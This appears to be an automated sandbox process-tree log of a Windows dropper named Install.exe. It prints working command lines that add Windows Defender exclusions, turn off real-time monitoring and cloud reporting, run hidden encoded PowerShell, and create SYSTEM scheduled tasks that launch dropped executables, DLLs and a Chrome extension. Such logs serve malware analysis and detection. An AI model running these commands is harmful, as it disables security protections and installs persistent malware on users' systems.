C:\Users\Admin\AppData\Local\Temp\7zS5F40.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\7zS6152.tmp\Install.exe.\Install.exe /TdidFGK "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2748
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2696
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2632
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2584
-
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:326⤵PID:1952
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyGKnkDCr" /SC once /ST 02:27:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyGKnkDCr"4⤵PID:2660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyGKnkDCr"4⤵PID:804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfQCIeAfoMUjiMvHpK" /SC once /ST 10:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\eGpoUau.exe\" Xd /Jtsite_idOcH 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2528
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {57DD4465-7BE9-485B-A2F9-6CD101B5DE8C} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]1⤵PID:3012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:868
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:564
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:552
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1064
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:844
-
C:\Windows\system32\taskeng.exetaskeng.exe {C9E64632-ED60-408E-8B3B-009ABFE6B363} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1820
-
C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\eGpoUau.exeC:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\zkYnJmYRuJHCWjs\eGpoUau.exe Xd /Jtsite_idOcH 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1036 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyiaXfILo" /SC once /ST 09:19:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyiaXfILo"3⤵PID:2392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyiaXfILo"3⤵PID:2132
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1292
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2156
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1648
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsHMABIBF" /SC once /ST 01:10:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsHMABIBF"3⤵PID:1268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsHMABIBF"3⤵PID:1472
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:323⤵PID:2192
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:643⤵PID:2872
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:323⤵PID:1288
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:324⤵PID:3004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:643⤵PID:2084
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:644⤵PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\prcciRLxuAmrJUJV\DwomsIqK\zuYzBSDJApUyPeYl.wsf"3⤵PID:2876
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\prcciRLxuAmrJUJV\DwomsIqK\zuYzBSDJApUyPeYl.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2840 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ORLhyEwmHZTZsrVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ORLhyEwmHZTZsrVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:644⤵PID:368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:324⤵PID:1800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:324⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:644⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:324⤵PID:2956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:644⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:324⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:644⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:324⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:644⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ORLhyEwmHZTZsrVB" /t REG_DWORD /d 0 /reg:324⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ORLhyEwmHZTZsrVB" /t REG_DWORD /d 0 /reg:644⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU" /t REG_DWORD /d 0 /reg:324⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU" /t REG_DWORD /d 0 /reg:644⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:324⤵PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\prcciRLxuAmrJUJV" /t REG_DWORD /d 0 /reg:644⤵PID:1268
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmZNFlkvu" /SC once /ST 04:58:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmZNFlkvu"3⤵PID:1012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmZNFlkvu"3⤵PID:1600
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2144
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2084
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1576
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PYxBkvPuMRnFgrady" /SC once /ST 02:37:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\prcciRLxuAmrJUJV\BQKQobLNmrZfNTa\nVdChUm.exe\" qd /ULsite_idDIc 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PYxBkvPuMRnFgrady"3⤵PID:2632
-
-
-
C:\Windows\Temp\prcciRLxuAmrJUJV\BQKQobLNmrZfNTa\nVdChUm.exeC:\Windows\Temp\prcciRLxuAmrJUJV\BQKQobLNmrZfNTa\nVdChUm.exe qd /ULsite_idDIc 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2932 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bfQCIeAfoMUjiMvHpK"3⤵PID:2676
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2648
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1996
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nLtdqPxSU\novreh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "puEiLMJPChlWPyy" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "puEiLMJPChlWPyy2" /F /xml "C:\Program Files (x86)\nLtdqPxSU\ZTIPqGn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "puEiLMJPChlWPyy"3⤵PID:1480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "puEiLMJPChlWPyy"3⤵PID:2108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qOTfrABnjfFxtq" /F /xml "C:\Program Files (x86)\kTkhuvRgNyZU2\CICKOMF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIGAnUJbrZsCh2" /F /xml "C:\ProgramData\ORLhyEwmHZTZsrVB\jXfEhTd.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tocFlaJiGWcETvbqL2" /F /xml "C:\Program Files (x86)\VruDcINppTZNIqemGVR\FlHfZUQ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OfXYuUyTiHvdiUxFtnK2" /F /xml "C:\Program Files (x86)\NWoXnskKXdJGC\BOnjvVQ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UlrsxbhsbQOtZaLyo" /SC once /ST 05:30:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\prcciRLxuAmrJUJV\bCTwQvCB\DrEsxKF.dll\",#1 /Zasite_idEDL 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "UlrsxbhsbQOtZaLyo"3⤵PID:2064
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:996
-
